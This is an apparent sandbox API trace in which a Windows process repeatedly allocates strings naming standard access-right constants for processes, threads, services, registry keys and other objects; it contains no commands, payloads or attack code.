[0130.154] SysReAllocStringLen (in: pbstr=0x28fe8f0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28fe8f0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.154] SysReAllocStringLen (in: pbstr=0x28fe8e0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28fe8e0*="STANDARD_RIGHTS_WRITE") returned 1
[0130.154] SysReAllocStringLen (in: pbstr=0x28fe8d0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28fe8d0*="STANDARD_RIGHTS_READ") returned 1
[0130.154] SysReAllocStringLen (in: pbstr=0x28fe8c0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28fe8c0*="STANDARD_RIGHTS_ALL") returned 1
[0130.154] SysReAllocStringLen (in: pbstr=0x28fe8b0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28fe8b0*="DELETE") returned 1
[0130.154] SysReAllocStringLen (in: pbstr=0x28fe8a0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28fe8a0*="READ_CONTROL") returned 1
[0130.154] SysReAllocStringLen (in: pbstr=0x28fe890*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28fe890*="WRITE_OWNER") returned 1
[0130.154] SysReAllocStringLen (in: pbstr=0x28fe880*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28fe880*="WRITE_DAC") returned 1
[0130.154] SysReAllocStringLen (in: pbstr=0x28fe870*=0x0, psz="MUTEX_MODIFY_STATE", len=0x12 | out: pbstr=0x28fe870*="MUTEX_MODIFY_STATE") returned 1
[0130.154] SysReAllocStringLen (in: pbstr=0x28fe860*=0x0, psz="MUTEX_ALL_ACCESS", len=0x10 | out: pbstr=0x28fe860*="MUTEX_ALL_ACCESS") returned 1
[0130.154] SysReAllocStringLen (in: pbstr=0x28fe850*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28fe850*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.154] SysReAllocStringLen (in: pbstr=0x28fe840*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28fe840*="STANDARD_RIGHTS_WRITE") returned 1
[0130.154] SysReAllocStringLen (in: pbstr=0x28fe830*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28fe830*="STANDARD_RIGHTS_READ") returned 1
[0130.154] SysReAllocStringLen (in: pbstr=0x28fe820*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28fe820*="STANDARD_RIGHTS_ALL") returned 1
[0130.154] SysReAllocStringLen (in: pbstr=0x28fe810*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28fe810*="DELETE") returned 1
[0130.154] SysReAllocStringLen (in: pbstr=0x28fe800*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28fe800*="READ_CONTROL") returned 1
[0130.154] SysReAllocStringLen (in: pbstr=0x28fe7f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28fe7f0*="WRITE_OWNER") returned 1
[0130.155] SysReAllocStringLen (in: pbstr=0x28fe7e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28fe7e0*="WRITE_DAC") returned 1
[0130.155] SysReAllocStringLen (in: pbstr=0x28fe7d0*=0x0, psz="EVENT_MODIFY_STATE", len=0x12 | out: pbstr=0x28fe7d0*="EVENT_MODIFY_STATE") returned 1
[0130.155] SysReAllocStringLen (in: pbstr=0x28fe7c0*=0x0, psz="EVENT_ALL_ACCESS", len=0x10 | out: pbstr=0x28fe7c0*="EVENT_ALL_ACCESS") returned 1
[0130.155] SysReAllocStringLen (in: pbstr=0x28fe7b0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28fe7b0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.155] SysReAllocStringLen (in: pbstr=0x28fe7a0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28fe7a0*="STANDARD_RIGHTS_WRITE") returned 1
[0130.155] SysReAllocStringLen (in: pbstr=0x28fe790*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28fe790*="STANDARD_RIGHTS_READ") returned 1
[0130.155] SysReAllocStringLen (in: pbstr=0x28fe780*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28fe780*="STANDARD_RIGHTS_ALL") returned 1
[0130.155] SysReAllocStringLen (in: pbstr=0x28fe770*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28fe770*="DELETE") returned 1
[0130.155] SysReAllocStringLen (in: pbstr=0x28fe760*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28fe760*="READ_CONTROL") returned 1
[0130.155] SysReAllocStringLen (in: pbstr=0x28fe750*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28fe750*="WRITE_OWNER") returned 1
[0130.155] SysReAllocStringLen (in: pbstr=0x28fe740*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28fe740*="WRITE_DAC") returned 1
[0130.155] SysReAllocStringLen (in: pbstr=0x28fe730*=0x0, psz="SEMAPHORE_MODIFY_STATE", len=0x16 | out: pbstr=0x28fe730*="SEMAPHORE_MODIFY_STATE") returned 1
[0130.155] SysReAllocStringLen (in: pbstr=0x28fe720*=0x0, psz="SEMAPHORE_ALL_ACCESS", len=0x14 | out: pbstr=0x28fe720*="SEMAPHORE_ALL_ACCESS") returned 1
[0130.155] SysReAllocStringLen (in: pbstr=0x28fe710*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28fe710*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.155] SysReAllocStringLen (in: pbstr=0x28fe700*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28fe700*="STANDARD_RIGHTS_WRITE") returned 1
[0130.155] SysReAllocStringLen (in: pbstr=0x28fe6f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28fe6f0*="STANDARD_RIGHTS_READ") returned 1
[0130.155] SysReAllocStringLen (in: pbstr=0x28fe6e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28fe6e0*="STANDARD_RIGHTS_ALL") returned 1
[0130.155] SysReAllocStringLen (in: pbstr=0x28fe6d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28fe6d0*="DELETE") returned 1
[0130.155] SysReAllocStringLen (in: pbstr=0x28fe6c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28fe6c0*="READ_CONTROL") returned 1
[0130.155] SysReAllocStringLen (in: pbstr=0x28fe6b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28fe6b0*="WRITE_OWNER") returned 1
[0130.155] SysReAllocStringLen (in: pbstr=0x28fe6a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28fe6a0*="WRITE_DAC") returned 1
[0130.155] SysReAllocStringLen (in: pbstr=0x28fe690*=0x0, psz="JOB_OBJECT_SET_SECURITY_ATTRIBUTES", len=0x22 | out: pbstr=0x28fe690*="JOB_OBJECT_SET_SECURITY_ATTRIBUTES") returned 1
[0130.155] SysReAllocStringLen (in: pbstr=0x28fe680*=0x0, psz="JOB_OBJECT_TERMINATE", len=0x14 | out: pbstr=0x28fe680*="JOB_OBJECT_TERMINATE") returned 1
[0130.155] SysReAllocStringLen (in: pbstr=0x28fe670*=0x0, psz="JOB_OBJECT_QUERY", len=0x10 | out: pbstr=0x28fe670*="JOB_OBJECT_QUERY") returned 1
[0130.155] SysReAllocStringLen (in: pbstr=0x28fe660*=0x0, psz="JOB_OBJECT_SET_ATTRIBUTES", len=0x19 | out: pbstr=0x28fe660*="JOB_OBJECT_SET_ATTRIBUTES") returned 1
[0130.155] SysReAllocStringLen (in: pbstr=0x28fe650*=0x0, psz="JOB_OBJECT_ASSIGN_PROCESS", len=0x19 | out: pbstr=0x28fe650*="JOB_OBJECT_ASSIGN_PROCESS") returned 1
[0130.155] SysReAllocStringLen (in: pbstr=0x28fe640*=0x0, psz="JOB_OBJECT_ALL_ACCESS", len=0x15 | out: pbstr=0x28fe640*="JOB_OBJECT_ALL_ACCESS") returned 1
[0130.155] SysReAllocStringLen (in: pbstr=0x28fe630*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28fe630*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.156] SysReAllocStringLen (in: pbstr=0x28fe620*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28fe620*="STANDARD_RIGHTS_WRITE") returned 1
[0130.156] SysReAllocStringLen (in: pbstr=0x28fe610*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28fe610*="STANDARD_RIGHTS_READ") returned 1
[0130.156] SysReAllocStringLen (in: pbstr=0x28fe600*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28fe600*="STANDARD_RIGHTS_ALL") returned 1
[0130.156] SysReAllocStringLen (in: pbstr=0x28fe5f0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28fe5f0*="DELETE") returned 1
[0130.156] SysReAllocStringLen (in: pbstr=0x28fe5e0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28fe5e0*="READ_CONTROL") returned 1
[0130.156] SysReAllocStringLen (in: pbstr=0x28fe5d0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28fe5d0*="WRITE_OWNER") returned 1
[0130.156] SysReAllocStringLen (in: pbstr=0x28fe5c0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28fe5c0*="WRITE_DAC") returned 1
[0130.156] SysReAllocStringLen (in: pbstr=0x28fe5b0*=0x0, psz="THREAD_DIRECT_IMPERSONATION", len=0x1b | out: pbstr=0x28fe5b0*="THREAD_DIRECT_IMPERSONATION") returned 1
[0130.156] SysReAllocStringLen (in: pbstr=0x28fe5a0*=0x0, psz="THREAD_IMPERSONATE", len=0x12 | out: pbstr=0x28fe5a0*="THREAD_IMPERSONATE") returned 1
[0130.156] SysReAllocStringLen (in: pbstr=0x28fe590*=0x0, psz="THREAD_SET_THREAD_TOKEN", len=0x17 | out: pbstr=0x28fe590*="THREAD_SET_THREAD_TOKEN") returned 1
[0130.156] SysReAllocStringLen (in: pbstr=0x28fe580*=0x0, psz="THREAD_QUERY_INFORMATION", len=0x18 | out: pbstr=0x28fe580*="THREAD_QUERY_INFORMATION") returned 1
[0130.156] SysReAllocStringLen (in: pbstr=0x28fe570*=0x0, psz="THREAD_SET_INFORMATION", len=0x16 | out: pbstr=0x28fe570*="THREAD_SET_INFORMATION") returned 1
[0130.156] SysReAllocStringLen (in: pbstr=0x28fe560*=0x0, psz="THREAD_SET_CONTEXT", len=0x12 | out: pbstr=0x28fe560*="THREAD_SET_CONTEXT") returned 1
[0130.156] SysReAllocStringLen (in: pbstr=0x28fe550*=0x0, psz="THREAD_GET_CONTEXT", len=0x12 | out: pbstr=0x28fe550*="THREAD_GET_CONTEXT") returned 1
[0130.156] SysReAllocStringLen (in: pbstr=0x28fe540*=0x0, psz="THREAD_SUSPEND_RESUME", len=0x15 | out: pbstr=0x28fe540*="THREAD_SUSPEND_RESUME") returned 1
[0130.156] SysReAllocStringLen (in: pbstr=0x28fe530*=0x0, psz="THREAD_TERMINATE", len=0x10 | out: pbstr=0x28fe530*="THREAD_TERMINATE") returned 1
[0130.156] SysReAllocStringLen (in: pbstr=0x28fe520*=0x0, psz="THREAD_ALL_ACCESS", len=0x11 | out: pbstr=0x28fe520*="THREAD_ALL_ACCESS") returned 1
[0130.156] SysReAllocStringLen (in: pbstr=0x28fe510*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28fe510*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.156] SysReAllocStringLen (in: pbstr=0x28fe500*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28fe500*="STANDARD_RIGHTS_WRITE") returned 1
[0130.156] SysReAllocStringLen (in: pbstr=0x28fe4f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28fe4f0*="STANDARD_RIGHTS_READ") returned 1
[0130.156] SysReAllocStringLen (in: pbstr=0x28fe4e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28fe4e0*="STANDARD_RIGHTS_ALL") returned 1
[0130.156] SysReAllocStringLen (in: pbstr=0x28fe4d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28fe4d0*="DELETE") returned 1
[0130.156] SysReAllocStringLen (in: pbstr=0x28fe4c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28fe4c0*="READ_CONTROL") returned 1
[0130.156] SysReAllocStringLen (in: pbstr=0x28fe4b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28fe4b0*="WRITE_OWNER") returned 1
[0130.156] SysReAllocStringLen (in: pbstr=0x28fe4a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28fe4a0*="WRITE_DAC") returned 1
[0130.156] SysReAllocStringLen (in: pbstr=0x28fe490*=0x0, psz="PROCESS_QUERY_INFORMATION", len=0x19 | out: pbstr=0x28fe490*="PROCESS_QUERY_INFORMATION") returned 1
[0130.156] SysReAllocStringLen (in: pbstr=0x28fe480*=0x0, psz="PROCESS_SET_INFORMATION", len=0x17 | out: pbstr=0x28fe480*="PROCESS_SET_INFORMATION") returned 1
[0130.156] SysReAllocStringLen (in: pbstr=0x28fe470*=0x0, psz="PROCESS_SET_QUOTA", len=0x11 | out: pbstr=0x28fe470*="PROCESS_SET_QUOTA") returned 1
[0130.157] SysReAllocStringLen (in: pbstr=0x28fe460*=0x0, psz="PROCESS_CREATE_PROCESS", len=0x16 | out: pbstr=0x28fe460*="PROCESS_CREATE_PROCESS") returned 1
[0130.157] SysReAllocStringLen (in: pbstr=0x28fe450*=0x0, psz="PROCESS_DUP_HANDLE", len=0x12 | out: pbstr=0x28fe450*="PROCESS_DUP_HANDLE") returned 1
[0130.157] SysReAllocStringLen (in: pbstr=0x28fe440*=0x0, psz="PROCESS_VM_WRITE", len=0x10 | out: pbstr=0x28fe440*="PROCESS_VM_WRITE") returned 1
[0130.157] SysReAllocStringLen (in: pbstr=0x28fe430*=0x0, psz="PROCESS_VM_READ", len=0xf | out: pbstr=0x28fe430*="PROCESS_VM_READ") returned 1
[0130.157] SysReAllocStringLen (in: pbstr=0x28fe420*=0x0, psz="PROCESS_VM_OPERATION", len=0x14 | out: pbstr=0x28fe420*="PROCESS_VM_OPERATION") returned 1
[0130.157] SysReAllocStringLen (in: pbstr=0x28fe410*=0x0, psz="PROCESS_SET_SESSIONID", len=0x15 | out: pbstr=0x28fe410*="PROCESS_SET_SESSIONID") returned 1
[0130.157] SysReAllocStringLen (in: pbstr=0x28fe400*=0x0, psz="PROCESS_CREATE_THREAD", len=0x15 | out: pbstr=0x28fe400*="PROCESS_CREATE_THREAD") returned 1
[0130.157] SysReAllocStringLen (in: pbstr=0x28fe3f0*=0x0, psz="PROCESS_TERMINATE", len=0x11 | out: pbstr=0x28fe3f0*="PROCESS_TERMINATE") returned 1
[0130.157] SysReAllocStringLen (in: pbstr=0x28fe3e0*=0x0, psz="PROCESS_ALL_ACCESS", len=0x12 | out: pbstr=0x28fe3e0*="PROCESS_ALL_ACCESS") returned 1
[0130.157] SysReAllocStringLen (in: pbstr=0x28fe3d0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28fe3d0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.157] SysReAllocStringLen (in: pbstr=0x28fe3c0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28fe3c0*="STANDARD_RIGHTS_WRITE") returned 1
[0130.157] SysReAllocStringLen (in: pbstr=0x28fe3b0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28fe3b0*="STANDARD_RIGHTS_READ") returned 1
[0130.157] SysReAllocStringLen (in: pbstr=0x28fe3a0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28fe3a0*="STANDARD_RIGHTS_ALL") returned 1
[0130.157] SysReAllocStringLen (in: pbstr=0x28fe390*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28fe390*="DELETE") returned 1
[0130.157] SysReAllocStringLen (in: pbstr=0x28fe380*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28fe380*="READ_CONTROL") returned 1
[0130.157] SysReAllocStringLen (in: pbstr=0x28fe370*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28fe370*="WRITE_OWNER") returned 1
[0130.157] SysReAllocStringLen (in: pbstr=0x28fe360*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28fe360*="WRITE_DAC") returned 1
[0130.157] SysReAllocStringLen (in: pbstr=0x28fe350*=0x0, psz="PERM_FILE_CREATE", len=0x10 | out: pbstr=0x28fe350*="PERM_FILE_CREATE") returned 1
[0130.157] SysReAllocStringLen (in: pbstr=0x28fe340*=0x0, psz="PERM_FILE_WRITE", len=0xf | out: pbstr=0x28fe340*="PERM_FILE_WRITE") returned 1
[0130.157] SysReAllocStringLen (in: pbstr=0x28fe330*=0x0, psz="PERM_FILE_READ", len=0xe | out: pbstr=0x28fe330*="PERM_FILE_READ") returned 1
[0130.157] SysReAllocStringLen (in: pbstr=0x28fe320*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28fe320*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.157] SysReAllocStringLen (in: pbstr=0x28fe310*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28fe310*="STANDARD_RIGHTS_WRITE") returned 1
[0130.157] SysReAllocStringLen (in: pbstr=0x28fe300*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28fe300*="STANDARD_RIGHTS_READ") returned 1
[0130.157] SysReAllocStringLen (in: pbstr=0x28fe2f0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28fe2f0*="STANDARD_RIGHTS_ALL") returned 1
[0130.157] SysReAllocStringLen (in: pbstr=0x28fe2e0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28fe2e0*="DELETE") returned 1
[0130.157] SysReAllocStringLen (in: pbstr=0x28fe2d0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28fe2d0*="READ_CONTROL") returned 1
[0130.157] SysReAllocStringLen (in: pbstr=0x28fe2c0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28fe2c0*="WRITE_OWNER") returned 1
[0130.157] SysReAllocStringLen (in: pbstr=0x28fe2b0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28fe2b0*="WRITE_DAC") returned 1
[0130.158] SysReAllocStringLen (in: pbstr=0x28fe2a0*=0x0, psz="JOB_ACCESS_ADMINISTER", len=0x15 | out: pbstr=0x28fe2a0*="JOB_ACCESS_ADMINISTER") returned 1
[0130.158] SysReAllocStringLen (in: pbstr=0x28fe290*=0x0, psz="PRINTER_ACCESS_USE", len=0x12 | out: pbstr=0x28fe290*="PRINTER_ACCESS_USE") returned 1
[0130.158] SysReAllocStringLen (in: pbstr=0x28fe280*=0x0, psz="PRINTER_ACCESS_ADMINISTER", len=0x19 | out: pbstr=0x28fe280*="PRINTER_ACCESS_ADMINISTER") returned 1
[0130.158] SysReAllocStringLen (in: pbstr=0x28fe270*=0x0, psz="SERVER_ACCESS_ENUMERATE", len=0x17 | out: pbstr=0x28fe270*="SERVER_ACCESS_ENUMERATE") returned 1
[0130.158] SysReAllocStringLen (in: pbstr=0x28fe260*=0x0, psz="SERVER_ACCESS_ADMINISTER", len=0x18 | out: pbstr=0x28fe260*="SERVER_ACCESS_ADMINISTER") returned 1
[0130.158] SysReAllocStringLen (in: pbstr=0x28fe250*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x28fe250*="PRINTER_ALL_ACCESS") returned 1
[0130.158] SysReAllocStringLen (in: pbstr=0x28fe240*=0x0, psz="PRINTER_EXECUTE", len=0xf | out: pbstr=0x28fe240*="PRINTER_EXECUTE") returned 1
[0130.158] SysReAllocStringLen (in: pbstr=0x28fe230*=0x0, psz="PRINTER_WRITE", len=0xd | out: pbstr=0x28fe230*="PRINTER_WRITE") returned 1
[0130.158] SysReAllocStringLen (in: pbstr=0x28fe220*=0x0, psz="PRINTER_READ", len=0xc | out: pbstr=0x28fe220*="PRINTER_READ") returned 1
[0130.158] SysReAllocStringLen (in: pbstr=0x28fe210*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x28fe210*="PRINTER_ALL_ACCESS") returned 1
[0130.158] SysReAllocStringLen (in: pbstr=0x28fe200*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28fe200*="DELETE") returned 1
[0130.158] SysReAllocStringLen (in: pbstr=0x28fe1f0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28fe1f0*="READ_CONTROL") returned 1
[0130.158] SysReAllocStringLen (in: pbstr=0x28fe1e0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28fe1e0*="WRITE_OWNER") returned 1
[0130.158] SysReAllocStringLen (in: pbstr=0x28fe1d0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28fe1d0*="WRITE_DAC") returned 1
[0130.158] SysReAllocStringLen (in: pbstr=0x28fe1c0*=0x0, psz="SC_MANAGER_QUERY_LOCK_STATUS", len=0x1c | out: pbstr=0x28fe1c0*="SC_MANAGER_QUERY_LOCK_STATUS") returned 1
[0130.158] SysReAllocStringLen (in: pbstr=0x28fe1b0*=0x0, psz="SC_MANAGER_MODIFY_BOOT_CONFIG", len=0x1d | out: pbstr=0x28fe1b0*="SC_MANAGER_MODIFY_BOOT_CONFIG") returned 1
[0130.158] SysReAllocStringLen (in: pbstr=0x28fe1a0*=0x0, psz="SC_MANAGER_LOCK", len=0xf | out: pbstr=0x28fe1a0*="SC_MANAGER_LOCK") returned 1
[0130.158] SysReAllocStringLen (in: pbstr=0x28fe190*=0x0, psz="SC_MANAGER_ENUMERATE_SERVICE", len=0x1c | out: pbstr=0x28fe190*="SC_MANAGER_ENUMERATE_SERVICE") returned 1
[0130.158] SysReAllocStringLen (in: pbstr=0x28fe180*=0x0, psz="SC_MANAGER_CONNECT", len=0x12 | out: pbstr=0x28fe180*="SC_MANAGER_CONNECT") returned 1
[0130.158] SysReAllocStringLen (in: pbstr=0x28fe170*=0x0, psz="SC_MANAGER_CREATE_SERVICE", len=0x19 | out: pbstr=0x28fe170*="SC_MANAGER_CREATE_SERVICE") returned 1
[0130.158] SysReAllocStringLen (in: pbstr=0x28fe160*=0x0, psz="SC_MANAGER_ALL_ACCESS", len=0x15 | out: pbstr=0x28fe160*="SC_MANAGER_ALL_ACCESS") returned 1
[0130.158] SysReAllocStringLen (in: pbstr=0x28fe150*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28fe150*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.158] SysReAllocStringLen (in: pbstr=0x28fe140*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28fe140*="STANDARD_RIGHTS_WRITE") returned 1
[0130.158] SysReAllocStringLen (in: pbstr=0x28fe130*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28fe130*="STANDARD_RIGHTS_READ") returned 1
[0130.158] SysReAllocStringLen (in: pbstr=0x28fe120*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28fe120*="STANDARD_RIGHTS_ALL") returned 1
[0130.158] SysReAllocStringLen (in: pbstr=0x28fe110*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28fe110*="DELETE") returned 1
[0130.158] SysReAllocStringLen (in: pbstr=0x28fe100*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28fe100*="READ_CONTROL") returned 1
[0130.158] SysReAllocStringLen (in: pbstr=0x28fe0f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28fe0f0*="WRITE_OWNER") returned 1
[0130.159] SysReAllocStringLen (in: pbstr=0x28fe0e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28fe0e0*="WRITE_DAC") returned 1
[0130.159] SysReAllocStringLen (in: pbstr=0x28fe0d0*=0x0, psz="SERVICE_USER_DEFINED_CONTROL", len=0x1c | out: pbstr=0x28fe0d0*="SERVICE_USER_DEFINED_CONTROL") returned 1
[0130.159] SysReAllocStringLen (in: pbstr=0x28fe0c0*=0x0, psz="SERVICE_STOP", len=0xc | out: pbstr=0x28fe0c0*="SERVICE_STOP") returned 1
[0130.159] SysReAllocStringLen (in: pbstr=0x28fe0b0*=0x0, psz="SERVICE_START", len=0xd | out: pbstr=0x28fe0b0*="SERVICE_START") returned 1
[0130.159] SysReAllocStringLen (in: pbstr=0x28fe0a0*=0x0, psz="SERVICE_QUERY_STATUS", len=0x14 | out: pbstr=0x28fe0a0*="SERVICE_QUERY_STATUS") returned 1
[0130.159] SysReAllocStringLen (in: pbstr=0x28fe090*=0x0, psz="SERVICE_QUERY_CONFIG", len=0x14 | out: pbstr=0x28fe090*="SERVICE_QUERY_CONFIG") returned 1
[0130.159] SysReAllocStringLen (in: pbstr=0x28fe080*=0x0, psz="SERVICE_PAUSE_CONTINUE", len=0x16 | out: pbstr=0x28fe080*="SERVICE_PAUSE_CONTINUE") returned 1
[0130.159] SysReAllocStringLen (in: pbstr=0x28fe070*=0x0, psz="SERVICE_INTERROGATE", len=0x13 | out: pbstr=0x28fe070*="SERVICE_INTERROGATE") returned 1
[0130.159] SysReAllocStringLen (in: pbstr=0x28fe060*=0x0, psz="SERVICE_ENUMERATE_DEPENDENTS", len=0x1c | out: pbstr=0x28fe060*="SERVICE_ENUMERATE_DEPENDENTS") returned 1
[0130.159] SysReAllocStringLen (in: pbstr=0x28fe050*=0x0, psz="SERVICE_CHANGE_CONFIG", len=0x15 | out: pbstr=0x28fe050*="SERVICE_CHANGE_CONFIG") returned 1
[0130.159] SysReAllocStringLen (in: pbstr=0x28fe040*=0x0, psz="SERVICE_ALL_ACCESS", len=0x12 | out: pbstr=0x28fe040*="SERVICE_ALL_ACCESS") returned 1
[0130.159] SysReAllocStringLen (in: pbstr=0x28fe030*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28fe030*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.159] SysReAllocStringLen (in: pbstr=0x28fe020*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28fe020*="STANDARD_RIGHTS_WRITE") returned 1
[0130.159] SysReAllocStringLen (in: pbstr=0x28fe010*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28fe010*="STANDARD_RIGHTS_READ") returned 1
[0130.159] SysReAllocStringLen (in: pbstr=0x28fe000*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28fe000*="STANDARD_RIGHTS_ALL") returned 1
[0130.159] SysReAllocStringLen (in: pbstr=0x28fdff0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28fdff0*="DELETE") returned 1
[0130.159] SysReAllocStringLen (in: pbstr=0x28fdfe0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28fdfe0*="READ_CONTROL") returned 1
[0130.159] SysReAllocStringLen (in: pbstr=0x28fdfd0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28fdfd0*="WRITE_OWNER") returned 1
[0130.159] SysReAllocStringLen (in: pbstr=0x28fdfc0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28fdfc0*="WRITE_DAC") returned 1
[0130.159] SysReAllocStringLen (in: pbstr=0x28fdfb0*=0x0, psz="KEY_SET_VALUE", len=0xd | out: pbstr=0x28fdfb0*="KEY_SET_VALUE") returned 1
[0130.159] SysReAllocStringLen (in: pbstr=0x28fdfa0*=0x0, psz="KEY_CREATE_LINK", len=0xf | out: pbstr=0x28fdfa0*="KEY_CREATE_LINK") returned 1
[0130.159] SysReAllocStringLen (in: pbstr=0x28fdf90*=0x0, psz="KEY_CREATE_SUB_KEY", len=0x12 | out: pbstr=0x28fdf90*="KEY_CREATE_SUB_KEY") returned 1
[0130.159] SysReAllocStringLen (in: pbstr=0x28fdf80*=0x0, psz="KEY_NOTIFY", len=0xa | out: pbstr=0x28fdf80*="KEY_NOTIFY") returned 1
[0130.159] SysReAllocStringLen (in: pbstr=0x28fdf70*=0x0, psz="KEY_ENUMERATE_SUB_KEYS", len=0x16 | out: pbstr=0x28fdf70*="KEY_ENUMERATE_SUB_KEYS") returned 1
[0130.159] SysReAllocStringLen (in: pbstr=0x28fdf60*=0x0, psz="KEY_QUERY_VALUE", len=0xf | out: pbstr=0x28fdf60*="KEY_QUERY_VALUE") returned 1
[0130.159] SysReAllocStringLen (in: pbstr=0x28fdf50*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28fdf50*="STANDARD_RIGHTS_EXECUTE") returned 1
